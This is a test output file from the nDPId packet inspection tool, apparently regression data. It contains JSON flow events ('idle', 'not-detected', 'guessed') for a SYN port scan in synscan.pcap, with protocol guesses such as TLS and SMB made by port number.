+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":22939,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1318,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":416,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1318,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":416,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1479,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":417,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1479,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":417,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1379,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":416,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1379,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":416,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1570,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":417,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1570,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":417,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1431,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6565,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1431,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6565,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1515,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6565,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1515,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6565,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1334,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6566,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1334,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1492,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6567,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1492,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6567,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1411,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6566,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1411,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1557,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6567,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1557,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6567,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":425,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":425,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":425,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":425,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1289,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":427,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1289,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":427,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1361,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":427,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1361,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":427,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6580,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6580,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00632{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056274,"flow_last_seen":1278275056274,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056274,"flow_last_seen":1278275056274,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1435,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2492,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1435,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2492,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1672,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":444,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1672,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":444,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00633{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1755,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":444,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1755,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":444,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1511,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2492,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1511,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2492,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":445,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMBv23","breed":"Acceptable","category":"System"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 